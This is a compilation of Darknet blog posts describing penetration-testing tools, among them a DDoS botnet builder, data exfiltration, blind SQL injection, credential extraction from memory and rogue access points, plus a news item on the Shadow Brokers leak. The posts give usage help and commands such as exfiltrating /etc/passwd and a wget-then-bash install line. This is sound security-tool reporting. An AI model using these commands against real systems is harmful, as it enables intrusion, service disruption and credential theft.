WOL-E is a suite of tools for Wake on LAN security testing related to the WOL features of network attached computers, this is now enabled by default on many Apple computers.

This allows you to easily scan for Apple devices on a network (based on their MAC addresses).

Features

These tools include:

• Bruteforcing the MAC address to wake up clients
• Sniffing WOL attempts on the network and saving them to disk
• Sniffing WOL passwords on the network and saving them to disk
• Waking up single clients (post sniffing attack)
• Scanning for Apple devices on the network for WOL enabling
• Sending bulk WOL requests to all detected Apple clients

Usage

root@kali:~# wol-e -h

[*] WOL-E 1.0
[*] Wake on LAN Explorer - A collection a WOL tools.
[*] by Nathaniel Carew

    -m
        Waking up single computers.
        If a password is required use the -k 00:12:34:56:78:90 at the end of the above command.
        wol-e -m 00:12:34:56:78:90 -b 192.168.1.255 -p <port> -k <pass>
        Defaults:
        Port: 9
        Broadcast: 255.255.255.255
        Pass: empty

    -s
        Sniffing the network for WOL requests and passwords.
        All captured WOL requests will be displayed on screen and written to /usr/share/wol-e/WOLClients.txt.
        wol-e -s -i eth0

    -a
        Bruteforce powering on WOL clients.
        wol-e -a -p <port>
        Place the address ranges into the bfmac.lst that you wish to bruteforce.
        They should be in the following format:
        00:12:34:56
        Default port: 9

    -f
        Detecting Apple devices on the network for WOL enabling.
        This will output to the screen and write to /usr/share/wol-e/AppleTargets.txt for detected Apple MAC's.
        wol-e -f

    -fa
        Attempt to wake all detected Apple targets in /usr/share/wol-e/AppleTargets.txt.
        This will send a single WOL packet to each client in the list and tell you how many clients were attempted.
        wol-e -fa

You can download WOL-E here:

wol-e_2.0.orig.tar.gz

Or read more here.

The post WOL-E – Wake On LAN Security Testing Suite appeared first on Darknet - The Darkside.

fping is a program like ping which uses the Internet Control Message Protocol (ICMP) echo request to determine if a target host is responding.

fping differs from ping in that you can specify any number of targets on the command line, or specify a file containing the lists of targets to ping. Instead of sending to one target until it times out or replies, fping will send out a ping packet and move on to the next target in a round-robin fashion. In the default mode, if a target replies, it is noted and removed from the list of targets to check; if a target does not respond within a certain time limit and/or retry limit it is designated as unreachable.

fping also supports sending a specified number of pings to a target, or looping indefinitely (as in ping). Unlike ping, fping is meant to be used in scripts, so its output is designed to be easy to parse.

The binary named fping6 is the same as fping, except that it uses IPv6 addresses instead of IPv4.

Usage

−a Show systems that are alive.
−A Display targets by address rather than DNS name.
−b n Number of bytes of ping data to send. The minimum size (normally 12) allows room for the data that fping needs to do its work (sequence number, timestamp). The reported received data size includes the IP header (normally 20 bytes) and ICMP header (8 bytes), so the minimum total size is 40 bytes. Default is 56, as in ping. Maximum is the theoretical maximum IP datagram size (64K), though most systems limit this to a smaller, system-dependent number.
−B n In the default mode, fping sends several requests to a target before giving up, waiting longer for a reply on each successive request. This parameter is the value by which the wait time is multiplied on each successive request; it must be entered as a floating-point number (x.y). The default is 1.5.
−c n Number of request packets to send to each target. In this mode, a line is displayed for each received response (this can suppressed with −q or −Q). Also, statistics about responses for each target are displayed when all requests have been sent (or when interrupted).
−C n Similar to −c, but the per-target statistics are displayed in a format designed for automated response-time statistics gathering.
shows the response time in milliseconds for each of the five requests, with the "−" indicating that no response was received to the fourth request.
−d Use DNS to lookup address of return ping packet. This allows you to give fping a list of IP addresses as input and print hostnames in the output.
−D Add Unix timestamps in front of output lines generated with in looping or counting modes (−l, −c, or −C).
−e Show elapsed (round-trip) time of packets.
−f Read list of targets from a file. This option can only be used by the root user.
-g Generate a target list from a supplied IP netmask, or a starting and ending IP. Specify the netmask or start/end in the targets portion of the command line.
−h Print usage message.
−i n The minimum amount of time (in milliseconds) between sending a ping packet to any target (default is 25).
−l Loop sending packets to each target indefinitely. Can be interrupted with Ctrl-C; statistics about responses for each target are then displayed.
−m Send pings to each of a target host’s multiple interfaces.
−n Same as −d.
−p <n> In looping or counting modes (−l, −c, or −C), this parameter sets the time in milliseconds that fping waits between successive packets to an individual target. Default is 1000.
−q Quiet. Don’t show per-probe results, but only the final summary. Also don’t show ICMP error messages.
−Q n Like −q, but show summary results every n seconds.
−r n Retry limit (default 3). This is the number of times an attempt at pinging a target will be made, not including the first try.
−s Print cumulative statistics upon exit.
−S addr Set source address.
−I if Set the interface (requires SO_BINDTODEVICE support)
−t n Initial target timeout in milliseconds (default 500). In the default mode, this is the amount of time that fping waits for a response to its first request. Successive timeouts are multiplied by the backoff factor.
−T n Ignored (for compatibility with fping 2.4).
−u Show targets that are unreachable.
−O n Set the typ of service flag ( TOS ). n can be either decimal or hexadecimal (0xh) format.
−v Print fping version information.
−H n Set the IP TTL field (time to live hops).

You can download fping 3 here:

fping-3.13.tar.gz

Or read more here.

The post fping 3 – Multi Target ICMP Ping Tool appeared first on Darknet - The Darkside.

Miranda is a Python-based UPnP (Universal Plug-N-Play) client application designed to discover, query and interact with UPNP devices, particularly Internet Gateway Devices (aka, routers). It can be used to audit UPNP-enabled devices on a network for possible vulnerabilities.

Miranda was built on and for a Linux system and has been tested on a Linux 2.6 kernel with Python 2.5. However, since it is written in Python, most functionality should be available for any Python-supported platform. Miranda has been tested against IGDs from various vendors, including Linksys, D-Link, Belkin and ActionTec. All Python modules came installed by default on a Linux Mint 5 (Ubuntu 8.04) test system.

Features

Some of its features include:

• Interactive shell with tab completion and command history
• Passive and active discovery of UPNP devices
• Customizable MSEARCH queries (query for specific devices/services)
• Full control over application settings such as IP addresses, ports and headers
• Simple enumeration of UPNP devices, services, actions and variables
• Correlation of input/output state variables with service actions
• Ability to send actions to UPNP services/devices
• Ability to save data to file for later analysis and collaboration
• Command logging

Usage

root@kali:~# miranda -h

Command line usage: /usr/bin/miranda [OPTIONS]

    -s <struct file>    Load previous host data from struct file
    -l <log file>       Log user-supplied commands to log file
    -i <interface>      Specify the name of the interface to use (Linux only, requires root)
    -u          Disable show-uniq-hosts-only option
    -d          Enable debug mode
    -v          Enable verbose mode
    -h          Show help

You can download miranda-upnp here:

miranda-upnp-master.zip

Or read more here.

The post miranda-upnp – Interactive UPnP Client appeared first on Darknet - The Darkside.

Pompem is an open source exploit & vulnerability finder tool, designed to automate the search for Exploits and Vulnerability in the most important databases. Developed in Python, has a system of advanced search, that help the work of pen-testers and ethical hackers.

In the current version, it performs searches in PacketStorm security, CXSecurity, ZeroDay, Vulners, National Vulnerability Database, WPScan Vulnerability Database.

Usage

To get the list of basic options and information about the project:

$ python3.5 pompem.py -h

Options:
  -h, --help                      show this help message and exit
  -s, --search <keyword,keyword,keyword>  text for search
  --txt                           Write txt File
  --html                          Write html File

Examples of use:

$ python3.5 pompem.py -s Wordpress
$ python3.5 pompem.py -s Joomla --html
$ python3.5 pompem.py -s "Internet Explorer,joomla,wordpress" --html
$ python3.5 pompem.py -s FortiGate --txt
$ python3.5 pompem.py -s ssh,ftp,mysql

You can download Pompem here:

Pompem-v0.2.0.zip

Or read more here.

The post Pompem – Exploit & Vulnerability Finder appeared first on Darknet - The Darkside.

UFONet is an open redirect DDoS tool designed to launch attacks against a target, using insecure redirects in third party web applications, like a botnet. Obviously, only for testing purposes.

The tool abuses OSI Layer 7-HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multi-threading, proxies, origin spoofing methods, cache evasion techniques, etc.

Definition of an “Open Redirect”:

An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.

From: CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)

Usage

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v, --verbose         active verbose on requests
  --update              check for latest stable version
  --check-tor           check to see if Tor is used properly
  --force-yes           set 'YES' to all questions
  --disableisup         disable external check of target's status
  --gui                 run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')
    --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default SPOOFED)
    --host=HOST         Use another HTTP Host header (default NONE)
    --xforw             Set your HTTP X-Forwarded-For with random IP values
    --xclient           Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT   Select your timeout (default 10)
    --retries=RETRIES   Retries when the connection timeouts (default 1)
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS          Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS    Set max number of results for engine (default 10)
    --se=ENGINE         Search engine to use for 'dorking' (default: duck)
    --sa                Search massively using all search engines

  *Test Botnet*:
    -t TEST             Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me         Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies  Download 'zombies' from Community server: Turina
    --upload-zombies    Upload your 'zombies' to Community server: Turina
    --blackhole         Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP        Upload your 'zombies' to a 'blackhole'
    --down-from=DIP     Download your 'zombies' from a 'blackhole'

  *Research Target*:
    -i INSPECT          Search for biggest file (ex: -i 'http://target.com')

  *Configure Attack(s)*:
    --disable-aliens    Disable 'aliens' web abuse of test services
    --disable-isup      Disable check status 'is target up?'
    -r ROUNDS           Set number of rounds (default: 1)
    -b PLACE            Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')

Searching for ‘Zombies’

UFONet can dig on different search engines results to find possible ‘Open Redirect’ vulnerable sites. A common query string should be like this:

'proxy.php?url='
        'check.cgi?url='
        'checklink?uri='
        'validator?uri='

For example you can begin a search with:

./ufonet -s 'proxy.php?url='

Or providing a list of “dorks” from a file:

./ufonet --sd 'dorks.txt'

By default UFONet will uses a search engine called ‘duck’. But you can choose a different one:

./ufonet -s 'proxy.php?url=' --se 'bing'

This is the list of available search engines with last time that were working:

- duck [07/10/2015: OK!]
        - google [07/10/2015: OK!]
        - bing [07/10/2015: OK!]
        - yahoo [07/10/2015: OK!]
        - yandex [07/10/2015: OK!]

You can also search massively using all search engines supported:

./ufonet -s 'proxy.php?url=' --sa

To control how many ‘zombies’ recieve from search engines you can use:

./ufonet --sd 'dorks.txt' --sa --sn 20

At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.

Wanna check if they are valid zombies? (Y/n)

Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.

Wanna update your list (Y/n)

If you reply ‘Y’ your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:

+ with verbose:     ./ufonet -s 'proxy.php?url=' -v
     + with threads:     ./ufonet --sd 'dorks.txt' --sa --threads 100

You can download UFOnet here:

git clone https://github.com/epsylon/ufonet

Or read more here.

The post UFONet – Open Redirect DDoS Tool appeared first on Darknet - The Darkside.

Right now there’s a ton of people talking about the NSA Hack, the severity, the repercussions and the value of what has been leaked. It seems the 0-day exploits in the cache of stolen aren’t super recent ones, as it appears they are from 2013.

But even so, some of them haven’t been patched as both Cisco and Fortinet have warned customers about the vulnerabilities revealed in the data posted by Shadow Brokers.

A group calling itself the Shadow Brokers has started an online auction for top-of-the-range tools it claims were stolen from the Equation Group, a digital attack squad linked to the NSA.

The Shadow Brokers posted up news of the auction saying (in broken English) that they had been monitoring the Equation Group’s servers, had stolen the advanced hacking tools, and will auction them off to the highest bidder. The group said that if it gets Bitcoins worth $1m they will release the tools for free to everyone.

“We want make sure Wealthy Elite recognizes the danger cyber weapons, this message, our auction, poses to their wealth and control. Let us spell out for Elites. Your wealth and control depends on electronic data,” the group said [the link has since been taken down].

“You see what ‘Equation Group’ can do. You see what cryptolockers and stuxnet can do. You see free files we give for free. You see attacks on banks and SWIFT in news. Maybe there is Equation Group version of cryptolocker+stuxnet for banks and financial systems?”

Claims about stuff like this for sale online are often fake, so to prove their case the team posted sample code, which it says is around 40 per cent of the total, online. Postings on Github and other download sites have since been taken down, but not before some people got copies.

Now it seems NSA wasn’t hacked directly, but via an agency called Equation Group which is believed to be a digital cyber-terrorism arm of the NSA.

Even so, it brings up some well debated issues about the NSA reporting zero-day flaws to vendors rather than hoarding them (which the White House promised they would stop doing).

A preliminary analysis shows the revealed list seems to be focusing on router flaws, some of them quite old. Some files also share names with exploits listed in the NSA’s Tailored Access Operations hacking team’s catalogue for agents, revealed in 2013 by Edward Snowden.

Kaspersky, who first linked the Equation Group to the NSA, said it was analyzing the files but had no clue as to their veracity as yet. But Timo Steffens, a member of the German CERT-Bund team, is taking a skeptical line, although he acknowledged that if this is a fake, the scammers had put in a lot of effort.

Initial analysis by the likes of Kaspersky Labs, NSA whistleblower Edward Snowden, and a host of independent security researchers shore up claims by a hacking group calling itself Shadow Brokers that the exploits and toolsets it hopes to auction for millions of dollars in Bitcoins are legitimate Equation group weaponry.

Kaspersky Labs last year revealed the Equation group to be almost certainly a state-sponsored actor and, according to deep analysis of its activities, highly likely to be a wing of the National Security Agency given a series of very striking operational and technical similarities.

The Shadow Brokers group seems to likely originate from Russia, so this is a nation state vs nation state attack possibly at the highest levels of each countries intelligence agencies.

It’s an interesting story and it’s creating a lot of news and drama, it’s a tough call for NSA as they have to maintain their attack capabilities against Russia and China whilst also balancing the health of American commerce and the safety of all the users utilising equipment from those vendors.

Source: The Register

The post Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities appeared first on Darknet - The Darkside.

PowerShell Runspace Portable Post Exploitation Tool aimed at making Penetration Testing with PowerShell “easier”. PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.

It tries to follow the KISS principle, being as simple as possible. The main goal is to make it easy to use PowerShell offensively and help to evade antivirus and other mitigations solutions. It does this by:

1. Doesn’t rely on powershell.exe, it calls PowerShell directly through the .NET framework, which might help bypassing security controls like GPO, SRP and App Locker.
2. The payloads are executed from memory and never touch disk, evading most antivirus engines.

Since PowerOPS offers basically an interactive PowerShell command prompt you are free to use the PowerShell tools included the way you want, and additionally execute any valid PowerShell command.

What’s Inside The Runspace

• PowerShellMafia/Powersploit
  • Get-Keystrokes
  • Invoke-DllInjection
  • Invoke-Mimikatz
  • Invoke-NinjaCopy
  • Invoke-Shellcode
  • Invoke-ReflectivePEInjection
  • Invoke-TokenManipulation
  • Invoke-WMICommand
  • PowerUp
  • PowerView
• Nishang
  • Get-Information
  • Get-PassHashes
  • Port-Scan
• Auto-GPPPassword
• PowerCat
• Empire
  • Invoke-Psexec
  • Invoke-SSHCommand
• mimikittenz
• SMBAutoBrute
• PowerUpSQL

Additionally you can run any valid PowerShell command.

Powershell functions within the Runspace are loaded in memory from Base64 Encoded Strings.

Usage

Just run the binary and type ‘show’ to list available modules.

PS > show

[-] This computer is not part of a Domain! Some functions will not work!

[+] Nishang

 Get-Information    Get-PassHashes             Port-Scan

[+] PowerSploit

 Get-KeyStrokes     Invoke-DllInjection        Invoke-Mimikatz     Invoke-NinjaCopy
 Invoke-Shellcode   Invoke-TokenManipulation   Invoke-WmiCommand   Invoke-ReflectivePEInjection
 PowerView          PowerUp

[+] Empire

 Invoke-PsExec      Invoke-SSHCommand

[+] Others

 Auto-GPPPassword   Invoke-SMBAutoBrute        Invoke-mimikittenz  PowerCat
 PowerUpSQL

PS >

You can download PowerOPS here:

PowerOPS-v1.0-beta.zip

Or read more here.

The post PowerOPS – PowerShell Runspace Portable Post Exploitation Tool appeared first on Darknet - The Darkside.

IGHASHGPU is an efficient and comprehensive command line GPU based hash cracking program that enables you to retrieve SHA1, MD5 and MD4 hashes by utilising ATI and nVidia GPUs.

It even works with salted hashes making it useful for MS-SQL, Oracle 11g, NTLM passwords and others than use salts.

IGHASHGPU is meant to function with ATI RV 7X0 and 8X0 cards, as well as any nVidia CUDA video cards, providing a variable speed in accordance with the users GPU. The program also features a ‘-cpudontcare’ command that allows you to tell IGHASHGPU that it can use the maximum level of GPU, without any particular regard for CPU usage.

At the same time, you can set a temperature threshold for tracking your hardware (’-hm’), so you can make sure to desist any activity that causes your system to go over the permitted value (the default is 90 degrees Celsius).

It also has a feature that lets you set the block size so as to adjust the video response time and reduce any possible lags; if on the other hand, this is a characteristic that does not bother you in any particular way, you can input a higher value (as IGHASHGPU supports block sizes ranging between 16 and 23).

Hashes Supported for Cracking

As IGHASHGPU supports salted hashes it’s possible to use it for:

• Plain MD4, MD5, SHA1.
• NTLM
• Domain Cached Credentials
• Oracle 11g
• MySQL5
• MSSQL
• vBulletin
• Invision Power Board

Supported Cards/Requirements

• Only currently supported ATI cards are:
  • HD RV7X0
  • RV830/870
  • 4550
  • 4670
  • 4830
  • 4730
  • 4770
  • 4850
  • 4870
  • 4890
  • 5750
  • 5770
  • 5850
  • 5870
• Catalyst 9.9+ must be installed.
• Only supported nVidia cards are the ones with CUDA support, i.e. G80+.
• Systems with multiple GPUs supported.

Usage

ighashgpu.exe [switch:param] [hashfile.txt]

-c             csdepa Charset definition (caps, smalls (default), digits, special, space, all)
-u             [chars] User-defined characters
-uh           [HEX] User-defined characters in HEX (2 chars each)
-uhh         [HEX] User-defined characters in Unicode HEX (4 chars each)
-uf            [filename] Load characters from file. Not used with Unicode.
-sf            [password] Password to start attack from
-m           [mask] Password mask
-ms         [symbol] Mask symbol
-salt        [hex] Append salt after password
-asalt      [string] Append salt in ascii after password
-usalt      [string] Append salt in unicode after password
-ulsalt     [string] Same as above but unicode string firstly transformed to lower case
-min       [value] Minimum length (default == 4), must be >= 4
-max      [value] Maximum length (default == 6), must be <= 31 (not counting salt length)
-h           [hash] Hash to attack (16 or 20 bytes in HEX)
-t            [type] Type of hash to attack
-devicemask:[N] Bit mask for GPUs usage, bit 0 == first GPU (default 0xFF, i.e. all GPUs). 
-cpudontcare Tell ighashgpu that you want maximum from GPU and so don't care about CPU usage at all (and it means one CPU core at 100% per one GPU).
-hm               [N] Set threshold temperature for hardware monitoring, default is 90C. You can disable monitoring by setting this value to zero.
-blocksize     [N] Set block size, by default N = 23 which means 2^23 = 8388608 passwords offloaded to GPU in a single batch.
 
By default charset processed as ANSI one. (i.e. WideCharToMultiByte(CP_ACP, ...) You can change this with: 
 
-unicode  Use unicode
-oem        Use oem encoding
-codepage  [page] Convert charset to specific codepage (need to have it at system of course

You can download IGHASHGPU here:

ighashgpu_v0.80.16.1.zip

Or read more here.

The post IGHASHGPU – GPU Based Hash Cracking – SHA1, MD5 & MD4 appeared first on Darknet - The Darkside.

DBPwAudit is a Java database password auditing tool that allows you to perform online audits of password quality for several database engines. The application design allows for easy adding of additional database drivers by simply copying new JDBC drivers to the jdbc directory.

Configuration is performed in two files, the aliases.conf file is used to map drivers to aliases and the rules.conf tells the application how to handle error messages from the scan.

Compatibility

The tool has been tested and known to work with:

– Microsoft SQL Server 2000/2005
– Oracle 8/9/10/11
– IBM DB2 Universal Database
– MySQL

Requirements

The tool is pre-configured for these drivers but does not ship with them, due to licensing issues. The links below can be used to find some of the drivers. They should all be copied to the jdbc directory.

Links to JDBC Drivers:

– MySQL
– Microsoft SQL Server 2005
– Microsoft SQL Server 2000
– Oracle

Usage

root@darknet:~# dbpwaudit
DBPwAudit v0.8 by Patrik Karlsson <patrik@cqure.net>
----------------------------------------------------
DBPwAudit -s <server> -d <db> -D <driver> -U <users> -P <passwords> [options]

    -s - Server name or address.
    -p - Port of database server/instance.
    -d - Database/Instance name to audit.
    -D - The alias of the driver to use (-L for aliases)
    -U - File containing usernames to guess.
    -P - File containing passwords to guess.
    -L - List driver aliases.

Scan the SQL server (-s 192.168.1.130), using the specified database (-d testdb) and driver (-D MySQL) using the root username (-U root) and password dictionary (-P /usr/share/wordlists/nmap.lst):

root@darknet:~# dbpwaudit -s 192.168.1.130 -d testdb -D MySQL -U root -P /usr/share/wordlists/nmap.lst

You can download DBPwAudit here:

dbpwaudit_0_8.zip

Or read more here.

The post DBPwAudit – Database Password Auditing Tool appeared first on Darknet - The Darkside.

DET is a proof of concept Data Exfiltration Toolkit using either single or multiple channel(s) at the same time.

The idea behind DET was to create a generic tool-kit to plug any kind of protocol/service to test implemented Network Monitoring and Data Leakage Prevention (DLP) solutions configurations, against different data exfiltration techniques.

Features

DET already supports encryption and compression and also multiple protocols, listed here:

• HTTP(S)
• ICMP
• DNS
• SMTP/IMAP (eg. Gmail)
• Raw TCP
• PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

And other “services”:

• Google Docs (Unauthenticated)
• Twitter (Direct Messages)

The following modules are “experimental”:

• Skype (95% done)
• Tor (80% done)
• Github (30/40% done)

Usage

python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Installation

Clone the repo:

git clone https://github.com/sensepost/DET.git

Then:

pip install -r requirements.txt --user

In the future the author hopes to add proper data obfuscation and other modules (FTP, Flickr using Steganography and YouTube).

Read more here.

The post DET – Data Exfiltration Toolkit appeared first on Darknet - The Darkside.

BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.

Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don’t you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.

Features

The most important thing to note about BBQSQL is that it doesn’t care about the data or database, whilst most SQL Injection tools are built with specific databases or languages in mind.

• Exploits Blind SQL Injection Vulnerabilities
• Semi-Automatic
• Database Agnostic
• Versatile
• Utilises Two Search Techniques (binary_search & frequency_search)
• Concurrent HTTP requests
• Config Import/Export
• Custom Hooks
• Fast

Usage

Similar to other SQL Injection tools you must provide certain request information for the tool to work, for BBSQL this is:

• URL
• HTTP Method
• Headers
• Cookies
• Encoding methods
• Redirect behavior
• Files
• HTTP Auth
• Proxies

Then specify where the injection is going and what syntax we are injecting.

root@darknet:~# bbqsql
    _______   _______    ______    ______    ______   __       
   |       \ |       \  /      \  /      \  /      \ |  \      
   | $$$$$$$\| $$$$$$$\|  $$$$$$\|  $$$$$$\|  $$$$$$\| $$      
   | $$__/ $$| $$__/ $$| $$  | $$| $$___\$$| $$  | $$| $$      
   | $$    $$| $$    $$| $$  | $$ \$$    \ | $$  | $$| $$      
   | $$$$$$$\| $$$$$$$\| $$ _| $$ _\$$$$$$\| $$ _| $$| $$      
   | $$__/ $$| $$__/ $$| $$/ \ $$|  \__| $$| $$/ \ $$| $$_____ 
   | $$    $$| $$    $$ \$$ $$ $$ \$$    $$ \$$ $$ $$| $$     \
    \$$$$$$$  \$$$$$$$   \$$$$$$\  \$$$$$$   \$$$$$$\ \$$$$$$$$
                     \$$$                \$$$ 

                   _.(-)._
                .'         '.
               / 'or '1'='1  \
               |'-...___...-'|
                \    '='    /
                 `'._____.'` 
                  /   |   \
                 /.--'|'--.\
              []/'-.__|__.-'\[]
                      |
                     [] 

    BBQSQL injection toolkit (bbqsql)         
    Lead Development: Ben Toews(mastahyeti)         
    Development: Scott Behrens(arbit)         
    Menu modified from code for Social Engineering Toolkit (SET) by: David Kennedy (ReL1K)    
    SET is located at: http://www.secmaniac.com(SET)    
    Version: 1.0               
    
    The 5 S's of BBQ: 
    Sauce, Spice, Smoke, Sizzle, and SQLi
    


 Select from the menu:

   1) Setup HTTP Parameters
   2) Setup BBQSQL Options
   3) Export Config
   4) Import Config
   5) Run Exploit
   6) Help, Credits, and About

  99) Exit the bbqsql injection toolkit

bbqsql>

HTTP Parameters

BBQSQL has many http parameters you can configure when setting up your attack. At a minimum you must provide the URL, where you want the injection query to run, and the method. The following options can be set:

• files
• headers
• cookies
• url
• allow_redirects
• proxies
• data
• method
• auth

You specify where you want the injection query to be inserted by using the template ${injection}. Without the injection template the tool wont know where to insert the query.

You can download BBQSQL here:

bbqsql-v1.1.zip

Or read more here.

The post BBQSQL – Blind SQL Injection Framework appeared first on Darknet - The Darkside.

MANA Toolkit is a set of tools for rogue access point (evilAP) attacks and wireless MiTM.

More specifically, it contains the improvements to KARMA attacks implemented into hostapd, as well as some useful configs for conducting MitM once you’ve managed to get a victim to connect.

Contents

MANA Toolkit contains:

• kali/ubuntu-install.sh – simple installers for Kali 1.0.9 and Ubuntu 14.04 (trusty)
• slides – an explanation of what we’re doing here
• run-mana – the controller scripts
• hostapd-mana – modified hostapd that implements our new mana attacks
• crackapd – a tool for offloading the cracking of EAP creds to an external tool and re-adding them to the hostapd EAP config (auto crack ‘n add)
• sslstrip-hsts – our modifications to LeonardoNVE’s & moxie’s cool tools
• apache – the apache vhosts for the noupstream hacks; deploy to /etc/apache2/ and /var/www/ respectively

Installation

The simplest way to get up and running is it “apt-get install mana-toolkit” on Kali. If you want to go manual to get the latest version, check below. Make sure to edit the start script to point to the right wifi device.

To get up and running setup a Kali box (VM or otherwise), update it, then run kali-install.sh

To get up and running setup a Ubuntu 14.04 box (VM or otherwise), update it, then run ubuntu-install.sh

If you’re installing from git, you can use the following commands after you have grabbed the necessary dependencies:

git clone --depth 1 https://github.com/sensepost/mana
cd mana
git submodule init
git submodule update
make
make install

You can download MANA Toolkit here:

Source: mana-1.3.1.zip
Binary: mana-toolkit-1.3-1debian1_amd64.deb

Or read more here.

The post MANA Toolkit – Rogue Access Point (evilAP) And MiTM Attack Tool appeared first on Darknet - The Darkside.

OWASP Offensive Web Testing Framework is a project focused on penetration testing efficiency and alignment of security tests to security standards like: The OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST.

The purpose of this tool is to automate the manual and uncreative parts of pen testing. For example, Figuring out how to call “tool X” then parsing results of “tool X” manually to feed “tool Y” and so on is time consuming.

By reducing this burden we hope pen testers will have more time to:

• See the big picture and think out of the box,
• Find, verify and combine vulnerabilities efficiently,
• Have time to Investigate complex vulnerabilities like business logic, architectural flaws, virtual hosting sessions, etc.
• Perform more tactical/targeted fuzzing on seemingly risky areas
• Demonstrate true impact despite the short time-frames we are typically given to test.

This tool is however not a silver bullet and will only be as good as the person using it. Understanding and experience will be required to correctly interpret the tool output and decide what to investigate further in order to demonstrate the impact.

Features

• Web UI. Now configure and monitor OWTF via a responsive and powerful interface accessible via your browser.
• Exposes RESTful APIs to all core OWTF capabilties.
• Instead of implementing yet another spider (a hard job), OWTF will scrub the output of all tools/plugins run to gather as many URLs as possible.
• Scan by various aggression levels: OWTF supports scans which are based on the aggressiveness of the plugins/tools invoked.
• Extensible OWTF manages tools through ‘plugins’ making it trivial to add new tools.
• OWTF has been developed keeping Kali Linux in mind, but it also supports other pentesting distros such as Samurai-WTF, etc.
• Tool paths and configuration can be easily modified in the web interface.
• Fastest Python MiTM proxy yet!
• Crash reporting directly to Github issue tracker
• Comprehensive interactive report at end of each scan
• Easy plugin-based system; currently 100+ plugins!
• CLI and web interface

You can download OWASP OWTF here:

wget -N https://raw.githubusercontent.com/owtf/bootstrap-script/master/bootstrap.sh; bash bootstrap.sh

Or read more here.

The post OWASP OWTF – Offensive Web Testing Framework appeared first on Darknet - The Darkside.

mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes.

The aim of mimikittenz is to provide user-level (non-admin privileged) sensitive data extraction in order to maximise post exploitation efforts and increase value of information gathered per target.

NOTE: This tool is targeting running process memory address space, once a process is killed it’s memory ‘should’ be cleaned up and inaccessible however there are some edge cases in which this does not happen.

Features

Currently mimikittenz is able to extract the following credentials from memory:

Webmail

• Gmail
• Office365
• Outlook Web

Accounting

• Xero
• MYOB

Remote Access

• Juniper SSL-VPN
• Citrix NetScaler
• Remote Desktop Web Access 2012

Development

• Jira
• Github
• Bugzilla
• Zendesk
• Cpanel

IHateReverseEngineers

• Malwr
• VirusTotal
• AnubisLabs

Misc

• Dropbox
• Microsoft Onedrive
• AWS Web Services
• Slack
• Twitter
• Facebook

You can download mimikittenz here:

Invoke-mimikittenz.ps1

Or read more here.

The post mimikittenz – Extract Plain-Text Passwords From Memory appeared first on Darknet - The Darkside.

mitmproxy is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

It’s a console tool that allows interactive examination and modification of HTTP traffic. It differs from mitmdump in that all flows are kept in memory, which means that it’s intended for taking and manipulating small-ish samples.

The command-line companion called mitmdump provides tcpdump-like functionality to let you view, record, and programmatically transform HTTP traffic.

Features

• Intercept HTTP requests and responses and modify them on the fly.
• Save complete HTTP conversations for later replay and analysis.
• Replay the client-side of an HTTP conversations.
• Replay HTTP responses of a previously recorded server.
• Reverse proxy mode to forward traffic to a specified server.
• Transparent proxy mode on OSX and Linux.
• Make scripted changes to HTTP traffic using Python.
• SSL certificates for interception are generated on the fly.

Installation

Ubuntu comes with Python but we need to install pip, python-dev and several libraries. This was tested on a fully patched installation of Ubuntu 14.04.

sudo apt-get install python-pip python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev
sudo pip install mitmproxy

Once installation is complete you can run mitmproxy or mitmdump from a terminal.

On Ubuntu 12.04 (and other systems with an outdated version of pip), you may need to update pip using pip install -U pip before installing mitmproxy.

You can download mitmproxy here:

mitmproxy-v0.17.1.zip

Or read more here.

The post mitmproxy – Intercepting HTTP Proxy Tool aka MITM appeared first on Darknet - The Darkside.

